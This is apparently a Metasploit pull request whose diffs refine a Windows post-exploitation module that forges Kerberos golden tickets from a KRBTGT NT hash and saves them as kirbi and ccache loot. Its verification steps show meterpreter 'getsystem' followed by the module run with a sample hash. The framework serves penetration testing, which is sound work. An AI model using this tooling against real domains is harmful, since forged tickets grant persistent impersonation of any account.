### PR TITLE
Improve golden ticket module with hash check and better loot storage

### DIFF
--- a/lib/msf/core/auxiliary/report.rb
+++ b/lib/msf/core/auxiliary/report.rb
@@ -403,7 +403,7 @@ module Auxiliary::Report
     ext = 'bin'
     if filename
       parts = filename.to_s.split('.')
-      if parts.length > 1 and parts[-1].length <= 4
+      if parts.length > 1 and parts[-1].length <= 6
         ext = parts[-1]
       end
     end

--- a/lib/msf/core/exploit/remote/kerberos/ticket_converter.rb
+++ b/lib/msf/core/exploit/remote/kerberos/ticket_converter.rb
@@ -7,27 +7,30 @@ module Msf::Exploit::Remote::Kerberos
     def self.kirbi_to_ccache(krb_cred)
       enc_krb_part = Rex::Proto::Kerberos::Model::EncKrbCredPart.decode(krb_cred.enc_part.cipher)
       krb_cred_info = enc_krb_part.ticket_info[0]
+      cc_principal = Rex::Proto::Kerberos::CredentialCache::Krb5CcachePrincipal.new(
+        name_type: krb_cred_info.pname.name_type,
+        components: krb_cred_info.pname.name_string,
+        realm: krb_cred_info.prealm
+      )
+      client_principal = Rex::Proto::Kerberos::CredentialCache::Krb5CcachePrincipal.new(
+        name_type: krb_cred_info.pname.name_type,
+        components: krb_cred_info.pname.name_string,
+        realm: krb_cred_info.prealm
+      )
+      server_principal = Rex::Proto::Kerberos::CredentialCache::Krb5CcachePrincipal.new(
+        name_type: krb_cred_info.sname.name_type,
+        components: krb_cred_info.sname.name_string,
+        realm: krb_cred_info.srealm
+      )
 
       Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.new(
-        default_principal: {
-          name_type: krb_cred_info.pname.name_type,
-          realm: krb_cred_info.prealm,
-          components: krb_cred_info.pname.name_string
-        },
+        default_principal: cc_principal,
         credentials: [
           {
-            client: {
-              name_type: krb_cred_info.pname.name_type,
-              realm: krb_cred_info.prealm,
-              components: krb_cred_info.pname.name_string
-            },
-            server: {
-              name_type: krb_cred_info.sname.name_type,
-              realm: krb_cred_info.srealm,
-              components: krb_cred_info.sname.name_string
-            },
+            client: client_principal,
+            server: server_principal,
             keyblock: {
-              enctype: krb_cred_info.key.type,
+              enctype: Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC,
               data: krb_cred_info.key.value
             },
             authtime: krb_cred_info.auth_time,

--- a/lib/msf/core/exploit/remote/kerberos/ticket_converter.rb
+++ b/lib/msf/core/exploit/remote/kerberos/ticket_converter.rb
@@ -30,7 +30,7 @@ module Msf::Exploit::Remote::Kerberos
             client: client_principal,
             server: server_principal,
             keyblock: {
-              enctype: Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC,
+              enctype: krb_cred_info.key.type,
               data: krb_cred_info.key.value
             },
             authtime: krb_cred_info.auth_time,

--- a/lib/msf/core/exploit/remote/kerberos/ticket_converter.rb
+++ b/lib/msf/core/exploit/remote/kerberos/ticket_converter.rb
@@ -12,11 +12,7 @@ module Msf::Exploit::Remote::Kerberos
         components: krb_cred_info.pname.name_string,
         realm: krb_cred_info.prealm
       )
-      client_principal = Rex::Proto::Kerberos::CredentialCache::Krb5CcachePrincipal.new(
-        name_type: krb_cred_info.pname.name_type,
-        components: krb_cred_info.pname.name_string,
-        realm: krb_cred_info.prealm
-      )
+      client_principal = cc_principal.clone
       server_principal = Rex::Proto::Kerberos::CredentialCache::Krb5CcachePrincipal.new(
         name_type: krb_cred_info.sname.name_type,
         components: krb_cred_info.sname.name_string,

--- a/modules/post/windows/escalate/golden_ticket.rb
+++ b/modules/post/windows/escalate/golden_ticket.rb
@@ -4,7 +4,6 @@
 ##
 require 'metasploit/framework/hashes'
 
-
 class MetasploitModule < Msf::Post
   include Msf::Post::Windows::NetAPI
   include Msf::Post::Windows::Accounts
@@ -66,7 +65,6 @@ class MetasploitModule < Msf::Post
     id = datastore['ID'] || 0
     end_in = datastore['END_IN'] || 87608
 
-
     unless domain
       print_status('Searching for the domain...')
       domain = get_domain
@@ -118,14 +116,14 @@ class MetasploitModule < Msf::Post
     if Metasploit::Framework::Hashes.identify_hash(krbtgt_hash) != 'nt'
       fail_with(Failure::BadConfig, 'KRBTGT_HASH must be an NTHash')
     end
-    krbtgt_hash = krbtgt_hash.split(':')[1]
+    nt_hash = krbtgt_hash.split(':')[1]
 
     print_status("Creating Golden Ticket for #{domain}\\#{user}...")
     ticket = client.kiwi.golden_ticket_create({
       user: user,
       domain_name: domain,
       domain_sid: domain_sid,
-      krbtgt_hash: krbtgt_hash,
+      krbtgt_hash: nt_hash,
       id: id,
       group_ids: datastore['GROUPS'],
       end_in: end_in
@@ -140,7 +138,7 @@ class MetasploitModule < Msf::Post
                                    kirbi_ticket,
                                    "#{domain}\\#{user}-golden_ticket.kirbi",
                                    "#{domain}\\#{user} Golden Ticket")
-      print_status("Ticket saved to #{kirbi_location}")
+      print_status("Kirbi ticket saved to #{kirbi_location}")
       krb_cred = Rex::Proto::Kerberos::Model::KrbCred.decode(kirbi_ticket)
 
       ccache_ticket = Msf::Exploit::Remote::Kerberos::TicketConverter.kirbi_to_ccache(krb_cred)
@@ -150,7 +148,7 @@ class MetasploitModule < Msf::Post
                                    ccache_ticket.to_binary_s,
                                    "#{domain}\\#{user}-golden_ticket.ccache",
                                    "#{domain}\\#{user} Golden Ticket")
-      print_status("Ticket saved to #{ccache_location}")
+      print_status("ccache ticket saved to #{ccache_location}")
 
       if datastore['USE']
         print_status("Attempting to use the ticket...")

--- a/modules/post/windows/escalate/golden_ticket.rb
+++ b/modules/post/windows/escalate/golden_ticket.rb
@@ -144,10 +144,10 @@ class MetasploitModule < Msf::Post
       krb_cred = Rex::Proto::Kerberos::Model::KrbCred.decode(kirbi_ticket)
 
       ccache_ticket = Msf::Exploit::Remote::Kerberos::TicketConverter.kirbi_to_ccache(krb_cred)
-      ccache_location = store_loot("golden_ticket",
-                                   "ccache",
+      ccache_location = store_loot('golden_ticket',
+                                   'ccache',
                                    session,
-                                   ccache_ticket,
+                                   ccache_ticket.to_binary_s,
                                    "#{domain}\\#{user}-golden_ticket.ccache",
                                    "#{domain}\\#{user} Golden Ticket")
       print_status("Ticket saved to #{ccache_location}")


### PR DESCRIPTION
This PR fixes [Issue 16736](https://github.com/rapid7/metasploit-framework/issues/16376) to improve the golden_ticket module. Specifically, the changes do the following:
- Adds a check to ensure the provided hash is an NT hash
- Allows for file extensions up to 6 characters in loot storage
- Saves the golden ticket as a kirbi file
- Saves the golden ticket as a ccache file

## Verification
```
[meterpreter session]
meterpreter> getsystem
meterpreter> run post/windows/escalate/golden_ticket KRBTGT_HASH=AAD3B435B51404EEAAD3B435B51404EE:4390ee7cd95efa465397c193119edfcf

[Verify kirbi file written to loot]
[Verify ccache file written to loot]
```
